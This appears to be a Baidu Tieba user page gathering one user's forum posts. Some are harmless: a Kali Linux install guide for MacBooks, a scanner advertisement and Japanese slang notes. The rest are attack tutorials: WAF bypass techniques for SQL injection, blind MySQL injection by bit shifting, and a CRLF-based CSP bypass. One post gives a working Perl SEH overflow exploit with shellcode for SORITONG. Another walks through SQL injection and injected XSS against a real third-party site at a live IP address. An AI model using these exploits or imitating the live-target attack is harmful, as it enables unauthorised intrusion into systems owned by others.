mramydnei mramydnei
bla
关注数: 9 粉丝数: 236 发帖数: 3,201 关注贴吧数: 15
macbook安装kali linux(Debian) macbook安装kali linux(Debian) 当你尝试在macbook上single boot一个debian或kali linux时(如果是ubuntu或BT的话,你会发现过程会异常的顺利),你会发现默认安装的GRUB或LILO都无法引导你的操作系统。这个问题也让我困惑了很长时间(因为默认安装的grub是0.9 这个版本不是efi bootable的)。经过长时间的努力,终于解决了这个问题。在这里和大家分享下这个过程。首先插入kali或debian的CD正常安装一次,安装完成后重启。然后按住option键,通过光盘进入到livecd当中。启动terminal: chroot / aptitude install grub2 gptsync #this will remove grub-pc gptsync sda #这里的sda是你系统所在的磁盘 grub-install /dev/sda2/ #sda2 是你的系统分区 update-grub shutdown -r now 完成以上步骤之后,你的系统已经可以正常的通过grub2来引导了。但是还有一个问题。在正常启动时系统会有一个30s的delay(如果你是按住option来启动并选择linux来启动的话可以缩短到3s,但是每次都要按很麻烦),这是因为你没有设置默认的启动分区 插入mac os x的安装光盘 重新启动,按住option 通过光盘启动 进入安装界面 从菜单选择terminal: bless --device /dev/disk0 --setBoot --legacy --verbose #这里的disk0是安装grub的分区,可以通过diskutil list来进行查看 reboot 现在你的kali(debian)已经可以完美的single boot了。 后续部分我都是参考的rootoorotor仁兄的吧博文: 修复sources.list(如果安装过程中没有连接到internet的话): root@kali:~# nano /etc/apt/sources.list #utsc sources deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali&urlrefer=133fe1f4142b7ad7c1c4d75132e80f32 kali main non-free contrib deb-src http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali&urlrefer=133fe1f4142b7ad7c1c4d75132e80f32 kali main non-free contrib deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fmirrors.ustc.edu.cn%2Fkali-security&urlrefer=cb8f8a49a11ec2206a13d15da25fb7ab kali/updates main contrib non-free #kali defualt sources deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb-src http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhttp.kali.org%2Fkali&urlrefer=1e72c7d298c7810be0b8563f1069c2a9 kali main non-free contrib deb http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fsecurity.kali.org%2Fkali-security&urlrefer=4001a080d748236fad38a99aba247d97 kali/updates main contrib non-free 加入之后就可以对系统进行更新了,终端中输入: root@kali:~# apt-get update && apt-get dist-upgrade 安装中文+日文输入法: root@kali:~#apt-get install ibus ibus-pinyin ibus-anthy 安装完成之后,打开终端输入: im-config 确认手工配置,选择你喜欢的输入法. 然后重启系统~ 如果你使用的是ibus: 右键点击右上角的输入法图标 —— 首选项 —— 输入法+中文 —— 高级——勾上所有程序共享使用同一个输入法 浏览器安装flash插件 apt-get install flashplugin-nonfree 安装wineQQ 2012 dpkg --add-architecture i386 刷新软件源: apt-get update 2.安装32位库与其库文件: apt-get install ia32-libs libnotify-bin ia32-libs-gtk 3.编译安装新版的 alsa-lib库,保证wineQQ2012在使用时不出现假死和无声等情况: wget http://tieba.baidu.com/mo/q/checkurl?url=ftp%3A%2F%2Fftp.alsa-project.org%2Fpub%2Flib%2Falsa-lib-1.0.26.tar.bz2&urlrefer=6ea63712762f0076d81dc37327356863 bzip2 -d alsa-lib-1.0.26.tar.bz2 tar -vxf alsa-lib-1.0.26.tar cd alsa-lib-1.0.26/ ./configure make && make install make clean 4.下载并安装wine QQ2012: wget http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.longene.org%2Fdownload%2FWineQQ2012-20121221-Longene.deb&urlrefer=398cb2dae4613011a8a74cccadc1bcd7 dpkg -i WineQQ2012-20121221-Longene.deb 安装NV显卡驱动: 1.首先确定自己的显卡型号, lspci |grep -i VGA 2.明确显卡驱动之后到nvidia官网搜索并下载驱动,如图: 下载完成之后得到一个名为 NVIDIA-Linux-x86_64-310.40.run 的文件,我把这个文件放到了root目录,并重命名为N.run(方便输入和补全) 打开终端: mv NVIDIA-Linux-x86_64-310.40.run /root/N.run 添加可执行权限(貌似不用这步也可以,不过我是加上了) chmod 777 N.run 3.在开始安装之前,请分别安装下面的软件包确保安装环境: apt-get install dkms build-essential 3.在/etc/modprobe.d/目录下新建一个名为nouveau-kms.conf的文件在里面写入一行options nouveau modeset=0 命令如下: echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf 然后执行: update-initramfs -u 重启系统,进入桌面后按 Ctrl+Alt+F2 组合键,输入用户名和密码进入 tty1(进入root用户) 开始配置: 关闭图形界面: /etc/init.d/gdm3 stop 执行安装驱动的文件: sh N.run 安装故过程中选择安装DKMS可能会安装失败 在爱这里我选择的是NO
老发翻译的也不太好,发一个自己写的 突破防注入的技巧(WAF) 空闲之余在国内外找了一些 bypass 防注入的代码,最后整理成了这个小文章。就像大牛们说的一样木有银弹,所以没有哪个方法是万能的,具体问题还得具体分析。希望大牛们表吐槽.大概的目录结构是这样: 第一章 通过编码突破防注入 1.1URL编码 1.2使用mysql内置函数 1.3使用base64变形注入 第二章 替换函数和关键字 2.1判断注入点的各种姿势 2.2替换空格的一些tips 2.3单引号的巧妙替换 2.4具有相似功能的mysql函数 2.5没有union 2.6没有limit 2.7没有where 2.8没有group 2.9没有having 2.10没有select 2.11没有and 2.12没有or 2.13突破preg_replace 第三章 多参数查询 3.1多参数的处理规则 3.2示例代码 第四章 打碎关键字 4.1使用%打碎关键字 4.2通过注释符打碎关键字 4.3使用%0b打碎关键字 4.4使用%6f打碎关键字 第五章 更改method方式 5.1cookie注入 5.2更改method为post 第六章 利用web服务器的特性 6.1web服务器和WAF对一些字符的处理 6.2示例代码 6.3突破安全狗 第七章 缓冲区溢出 7.1突破C编写的WAF 第八章 组合攻击 8.1request对象的包解析漏洞 8.2GPC组合攻击 第九章 大小写转换 9.1关键字的大小写转换 第十章 对参数值进行污染处理 10.1示例代码 第十一章 其它技巧 百度网盘下载连接:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D417485%26uk%3D4094653993&urlrefer=e54f503b2e52c563e450e70f327978e0
[翻译]关于通过对8bit的ascii做右位移提高mysql盲注效率 通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位 下面将以查询mysql数据库当中user()的第一位为例: ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1) 首先执行如下sql语句: mysql> select (ascii((substr(user(),1,1))) >> 7)=0; 我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的 第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1 如果运算结果为1,说明第一位为0,不为1 +————————————–+| (ascii((substr(user(),1,1))) >> 7)=0 |+————————————–+| 1 |+————————————–+ 1 row in set (0.00 sec) 这样我们就确定这个8bit的ascii的第一位为0 第二次我们来做6次右偏移来确定前两位 前两位可能是01或00,即依然可以与0做比较, mysql> select (ascii((substr(user(),1,1))) >> 6)=0; +————————————–+| (ascii((substr(user(),1,1))) >> 6)=0 |+————————————–+| 0 |+————————————–+ 1 row in set (0.00 sec) 结果为0,即第二位为1 开始猜测前三位为010或011 让我们看看010和011的ascii码是多少 分别查询select b’011′ select b’010′ 获得结果 010 = 2 011 = 3 执行如下sql: mysql> select (ascii((substr(user(),1,1))) >> 5)=2; +————————————–+| (ascii((substr(user(),1,1))) >> 5)=2 |+————————————–+| 0 |+————————————–+ 即前三位不为010,而是011 直到获得最后一位 最终结果为:01110010 转换一下: select b’01110010′ 查询结果 +————-+| b’01110010′ |+————-+| r |+————-+ 1 row in set (0.00 sec) 这样我们就获得了user()的第一位.其它位依此类推
听说升到3级有大权限发一个以前自己翻译的东西 CRLF和CSP 首先要简单的介绍一下一个东西,叫CSP(Content SEcurity Policy)现在XSS那么火,相信基友们也都听说过。简单的来说CSP主要是以防止注入型的攻击而开发的,比如说:XSS虽然江湖传闻CSP是XSS的终结者,但广大基友们的姿势还是很多的。CRLF就是其中的一种姿势了。作为一种具有可更改HTTP Response header的攻击方式,在这里就可以带给我们绕过CSP的一种可能性。 在这里穿插一点小内容:CRLF和CSP比如说我们用CRLF的方式插入了一个Content-Security-Policy。这时就存在了两个相同的Content-Security-Policy。而对于这个相同的内容的处理,每个浏览器都是不一样的。有些浏览器会选择位置靠前的,而部分浏览器也会选择位置靠后的。让我们来做一个有趣的实验: 一个简单的CSP规则大概可以使这个样子:Content-Security-Policy: default-src 'self' 现在假设存在两个页面: ------------------------------------ 页面1: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3000%2Fcsp&urlrefer=7bd6e0ed01d76660471f3274a9c4a16e内容为:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3333%2Fxss.js&urlrefer=083199e5ad95d4f2a1b10b3a4ad57561 ------------------------------------ 页面二: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhost%3A3333%2Fxss.js&urlrefer=083199e5ad95d4f2a1b10b3a4ad57561内容为:alert('XSS’) ------------------------------------ 我们先把情况分为两大类:第一种情况:http response header会比CSP header快一些在这里我们在根据浏览器的取舍原则,把情况分成两类: (1)出现重复的header内容以靠前的为准。在这个情况下我们可以直接这样的GET请求: GET http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.2cto.com&urlrefer=ae94fc109f7cfbf59e5ae27c01d13679 :3000/csp?Content-Security-Policy: allow *而这时的HTTP response可能会是这样: ------------------------------------------- HTTP/1.1 200 OKconnection:closeX-Content-Security-Policy: allow *X-Runtime:3X-Content-Security-Policy: default-src 'self'Content-Type:text/htmlContent-Length:81 -------------------------------------------- pwned!成功地绕过CSP! (2)出现重复的header内容以靠后的为准。我们只需要把下面的X-Content-Security-Policy一直往回推推到页面当中就可以了:我们的请求可以这样的:GET http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flocalhsot%3A3000%2Fcsp%3Flang%3Djp&urlrefer=b8f796f968241aa2915defae9867ace7 <html>通过下面的内容你可以看出我们可怜的CSP已经被挤到了html页面当中: --------------------------------------------------------------- HTTP/1.1 200 OKconnection:closeDate:15.01.2013lang:jap <html>Etag:"a25cda3f45v54v45h45g45v34v34v34v334v34v3"X-content-Security_plicy:default-src 'self'Content-Type:text/htmlContent-Length:81 ---------------------------------------------------------------- pwned!成功绕过! 第二种情况:http response header会比CSP header慢一些 (1)出现重复的header内容以靠前的为准。 (2)出现重复的header内容以靠后的为准
exploit编写 -误人子弟系列教程 基于SEH的堆栈溢出视频(二) 网盘地址: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fpan.baidu.com%2Fshare%2Flink%3Fshareid%3D154755%26uk%3D4094653993&urlrefer=78d7c93c374bc0e93b8f6b5b66e44a73 目标程序:SORITONG v1.0 测试环境: WINXP SP3 步骤: (1)通过junkcode来crash程序。初步判定可溢出性 (2)确定se hendler和next SEH的offset (3)填入我们构造好的pop pop ret 和short jump代码 (4)加上我们的payload (5)pwned! 一个典型的基于SEH的栈溢出模型: ------------------------------------------------------- buffer nextSEH SE Handler shellcode - junkcode 跳到shellcode 跳到nextSEH payload - ------------------------------------------------------- SE Handler: pop/pop/ret (确认不受safeseh保护)next SEH: 0xeb 0x06 0x90 0x90(通过上面的pop pop ret触发下一个seh,再通过nextseh跳到shellcode) tips: 可以通过immunity debugger插件:pvefindaddr来查询不受safeseh保护的dll 命令: !pvefindaddr nosoafessh 序列命令(sequence commands): pop r32 pop r32 retn 附exp: my $file="UI.TXT"; my $junk="\x41" x 584; my $nextseh="\xeb\x06\x90\x90"; my $sehandler= pack('V',0x010b4233); my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca"; my $junk2="\x90" x 1000; open($FILE, ">$file"); print $FILE $junk.$nextseh.$sehandler.$shellcode.$junk2; close($FILE);
好吧 我想要这个!!!!!好贵!!静态源码分析工具thunderscan Thunderscan是由defensecode研发出来的静态源码分析工具。它可以 在 流行的开源 Web应用程序 中 发现 严重安全漏洞 ,在过去 ThunderScan 产品曾多次 证明 了这一切。 --------------------------------------------------------------------------------- 主要特点: * 保护您的 Web应用程序 * 防止 数据被窃取 * 在Web应用程序 发现 危险的安全漏洞 , * 让黑客 远离 您的网站 * 防止 SQL 注入,跨 站脚本 攻击等。 * 审核 您 的 Web应用程序代码 --------------------------------------------------------------------------------- 支持的Web 应用程序开发语言 : • ASP.NET C# •VB.Net • ASP •PHP •JAVA / JSP --------------------------------------------------------------------------------- 可以检测: SQL Injection XPATH Injection File Disclosure Mail Relay Page Inclusion Dangerous Configuration Settings Code Injection Dangerous File Extensions Shell Command Execution Misc. Dangerous Functions Cross Site Scripting Arbitrary Server Connection File Manipulation Weak Encryption HTTP Response Splitting Information Leak LDAP Injection --------------------------------------------------------------------------------- 目前支持全系列的脚本语言的版本,售价: $6,000.00 附youtube视频: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Ddcml2stPYNM%26hd%3D1&urlrefer=30555c676303b57d16bf1a180527afe4 demo中跑的是Mutillidae你们懂得!!
基于sqli的xss 基于sqli的xss 首先这不是一个好的例子。因为这个注入点完全可以得到我们想要的东西。我没工具所以就 找以前搞过的下手。 关于xss和sqli我认为没有必要去比较轻重,这是我个人的看法你可以不同意。 一个简单的例子: 注入点: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d 紧接着 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d order by 1 ... ... http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D100&urlrefer=7f6789ce45dade26bc9858d7daa0176d order by 10时报错,所以有9个字段。 好了,下一步: http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,2,3,4,5,6,7,8,9 from admin 我们通过这种方法成功的更换了这九个字段的内容为"1,2,3,4,5,6,7,8,9"。而且它成功的显示到了当前页面当中。 -------------------------------------------------------------------------------- 其实这大概是一个这样的过程: SELECT title, content, BigClassName, SmallClassName, imagenum, firstImageName, [user], infotime, hits FROM News WHERE (ID = - 100) UNION SELECT 1 AS Expr1, 2 AS Expr2, 3 AS Expr3, 4 AS Expr4, 5 AS Expr5, 6 AS Expr6, 7 AS Expr7, 8 AS Expr8, 9 AS Expr9 FROM Admin --------------------------------------------------------------------------------- 那我们把2换成null测试一下, http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,null,3,4,5,6,7,8,9 from admin 没有问题。这个当然不会有问题 我知道这是废话但当字段数超过30,40的时候你是不是1,2,3,4,5,.....61这样一个一个输入的很爽呢(总有你手工的时候)?你可以复制一个 ,null粘贴你需要的次数下就好 这是第一个问题。 紧接着我们再替换2为"**** me!" http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,"**** me!",3,4,5,6,7,8,9 from admin 标识2的位置成功显示"**** me" 那我们再把2换成一个xss http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2F202.201.252.218%2Fjgxy%2FJGXY_WEB%2Fview.asp%3Fid%3D-100&urlrefer=eb7a74c280b6c43e6100c1995b7ab8d5 union select 1,"<script>alert('**** me!')</script>",3,4,5,6,7,8,9 from admin 好吧,这次它弹起来了。 一个基于sqli的xss就这样诞生了。 一个反射型的xss的价值有多大?我不知道。 一个基于sqli的xss有没有意义?我也不知道。 但我就这么做了。 谢谢阅读
转自维基百科 若者言叶 强调として用いるもの 超 「超特急」などと同じ意味の「超」であり、「かなり」「本当に」などの强意を表すのに使用される接头语である。通常は汉字で表记する。一般的には「超気持ちいい」「超面白い(面白え)」などの形容词、「超感动した」「超寝た」のような「超+(动词)」との组み合わせで使用される。「超最悪」のように、悪い意味の强调にも使われる。この用法では本来の「○○を超える」という意味合いはほとんどない。例えば、この用法で「超平凡」と言ったら「非凡」という意味ではなく、「极めて平凡である」の意味である。「バリ」「鬼」等の言い回しもある。 めっちゃ めちゃくちゃ(灭茶苦茶・灭茶灭茶)の転で、「めっちゃかわいいやん」のように使用される副词。転じて「めっさ」や「もっさ」、また「无茶苦茶」の転で「むっちゃ」や「むちゃ」ともいう。もとは大阪の若年层から広まった関西地方の若者言叶である。しかし、関西出身芸人のメディアでの使用などによって全国的に知られる表现となり、全国放送のテレビ番组名に使用されたり(「めちゃ×2イケてるッ!」)、2000年に神奈川県出身の田岛宁子が「めっちゃ悔しい!!」と発言して流行语になったりした。 普通に 强调の意味合いで用いる。もう1つの用法として、「普通に大きい」や「普通に凄い」などのように使う。特别な意味づけや解釈、见方をするには及ばず、常识的に、「普通に」考えてという意味合いである。「いや、普通にそうですよ」(あなたにとってはそれは普通とは思えないかもしれませんが)など。 パネェ 「半端じゃない」→「半端じゃねぇ」→「半端ねぇ」→「パネェ」と変化した、强意を表すのに使用される语である。「パネェくらい好き」といえば「ものすごく好き」という意味である。 神 宗教としての意味合いはない。常识や想定を超える感动を与えるカリスマという意味で使われる。ネットスラングから転用されたもの。 ドカ食い ある机会に普段以上に大量に食べること。大食いと类似するが、大食いは日常的にたくさん食べることをいう。古くから「どか雪」と一度に极めて多い积雪を表现し、「多い」や「大きい」に代わる强调のことば。「どかべん」とも通じる。 ガン见 视线を外さずにある程度の时间、じっと见ること。「がんを飞ばす」とはまた违ったニュアンスの言叶。どちらかと言うと「凝视」の意味に似ている。これとは逆に、意识をしているかどうかにかかわらず、一瞬チラッと见ることをその名の通りチラ见という。爱犬が饵を待つ时など、じっと见る、赤ちゃんがお母さんを、じっと见る等、见つめる様を言う。 情绪的な表现 キモい 「気持ち悪い」が短缩されたもの。「キモい」や「キモイ」と表记される。直接的に対象を「気持ち悪い」と言うよりも若干軽いニュアンスで用いられる。「きめぇ」や「キモス」とも。ヘンタイよいこ新闻1980年11月号では、投稿者が「これは方言ですか?それとも、我が家だけで通用している言叶ですか?」と「キモい」という言叶を使用している。 类义语に「きしょい」があるが、これは「気色悪い」が転じたものである。「キモい」や「キモイ」とほぼ同义。 マジ 「真面目」の転であるが、一般的に「本当に〜」や「本気で〜」と、强调または真実性の表现として用いられる。古くは、江戸时代の洒落本『にやんの事だ』(1781年)「気の毒そふなかほ付にてまじになり」にみられる。この例は名词であるが、现在は真実性・厳密性を表现する:副词としての用法が多い。汉字として「本気」の字を当てることもある。例としては「マジビビった」「マジムカついた」「それマジで?」など。最后の例のマジは名词で、「それは本当(真実)?」の意である。近年はガチンコを略した「ガチ」も同意语で使われる。
1 下一页